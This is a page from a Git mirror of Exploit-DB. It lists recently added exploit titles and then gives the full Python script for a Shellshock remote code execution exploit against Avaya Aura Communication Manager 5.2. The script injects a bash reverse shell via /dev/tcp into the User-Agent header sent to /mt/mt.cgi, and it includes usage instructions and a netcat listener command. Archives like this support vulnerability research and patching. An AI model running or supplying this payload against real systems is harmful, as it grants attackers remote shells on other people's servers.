bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/48077.txt
Offensive Security 228a37da9c DB: 2020-02-18 
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
2020-02-18 05:01:54 +00:00

51 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
###############################################
#!/usr/bin/python
import sys
import requests
if len(sys.argv) < 4:
print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
print "[*] Netcat Listener: nc -lvvnp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]
http_headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
}
def main():
if len(sys.argv) == 4:
print "[+] Success, spawning a shell on your custom port :)..."
requests.get(url, headers=http_headers, verify=False, timeout=5)
else:
print "[-] Something went wrong, quitting..."
sys.exit()
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink